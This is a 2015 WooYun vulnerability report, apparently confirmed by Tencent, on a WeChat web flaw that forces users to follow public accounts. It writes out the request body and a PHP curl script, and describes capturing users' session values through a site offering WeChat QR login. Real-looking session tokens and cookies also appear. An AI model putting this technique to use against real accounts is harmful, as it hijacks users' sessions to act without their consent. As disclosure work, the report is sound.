漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0150266
漏洞标题:微信强制用户关注公众号
相关厂商:腾讯
漏洞作者: 莫里
提交时间:2015-11-10 12:10
修复时间:2015-12-26 16:50
公开时间:2015-12-26 16:50
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开
简要描述:
微信强制用户关注公众号
详细说明:
微信设计错误,可导致用户强制关注公众号
漏洞内容:
第一步测试 登陆微信网页版
之后转发一个微信公众号关注链接过来
找到接口 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser
之后点击加好友没有用
发现还是有参数传递的
强制关注如下,只要发送下面参数就可以了
https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(微信用户值),"Sid":"(微信用户值)","Skey":"(微信用户值)","DeviceID":"(微信用户值)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(公众号加密值)","VerifyUserTicket":"(公众号加密值)"}],"VerifyContent":"我是(用户名)","SceneListCount":10,"SceneList":[33],"skey":"(用户值)"}
(用户值) 全部都可以通过 微信扫描登录获取到,只要你扫描登录我网站就能让这个微信号强制关注公众号
(公众号加密值)这个接口获取 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsync?sid=(微信的用户值)&skey=(微信的用户值)
最后测试发现 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(微信用户值),"Sid":"(微信用户值)","Skey":"(微信用户值)","DeviceID":"(微信用户值)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(公众号的微信号)","VerifyUserTicket":""}],"VerifyContent":"我是(用户名)","SceneListCount":10,"SceneList":[33],"skey":"(用户值)"}
强制关注条件如下 1.扫描登录我网站 2.知道要强制关注公众号的微信号
用户值获取再强调一遍,网站接入微信扫描登录即可拿到,上面的用户值,确实有这个漏洞
我经过测试一天,大概可以让一个微信号强制关注20个左右
$header = array (
'Host: wx2.qq.com',
'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0',
'Accept: application/json, text/plain, */*',
'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding: gzip, deflate',
'DNT: 1',
'Content-Type: application/json;charset=utf-8',
'Referer: https://wx2.qq.com/',
'Cookie: wxuin=2330616138; webwxuvid=cab5317930f5335a8994ade9a8160d9a0c1e843e1bd24ff03ab254c91d4ea3a8ec31a98c8d9adb6087cf6e9043d53c58; pgv_pvi=3286183936; pgv_pvid=8255006950; pgv_info=ssid=s2371423939; pgv_si=s1581726720; wxsid=hBgpWPQeDRDVm3Rc; wxloadtime=1444359620_expired; mm_lang=zh_CN; webwx_data_ticket=AQaRtHUZKZBvZZR2FeXCn5pg; MM_WX_NOTIFY_STATE=1; MM_WX_SOUND_STATE=1; wxpluginkey=1444352949',
'Connection: keep-alive',
);
$data='{"BaseRequest":{"Uin":2330616138,"Sid":"hBgpWPQeDRDVm3Rc","Skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4","DeviceID":"e589828811516427"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"gopartygo","VerifyUserTicket":""}],"VerifyContent":"我是123456789","SceneListCount":1,"SceneList":[33],"skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4"}';
$ch = curl_init("http://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444361009023");
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt ( $ch, CURLOPT_POST, 1 );
curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$b=curl_exec($ch);
curl_close($ch);
上面的是php代码,里面的用户值,你扫描登录微信网页版,你手动抓上去,运行就可以了
这个补充够充分了吧!!!代码都发你了,图片我截图不了给你,视频倒是可以,我懒得拍
漏洞证明:
https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300
{"BaseRequest":{"Uin":2330616138,"Sid":"Ix4w3k0gAVg1T5SW","Skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296","DeviceID":"e426131629909286"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"@888d1b21d2fe80dafe922ed50723874b","VerifyUserTicket":"v1_92c7ceebbd2a799f06c7e5f97fd352c5c040d63b8c40ec055b6968f5068860d3@stranger"}],"VerifyContent":"我是123456789","SceneListCount":10,"SceneList":[33],"skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296"}
修复方案:
微信有大神不瞎说了
版权声明:转载请注明来源 莫里@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-11-11 16:50
厂商回复:
非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:
暂无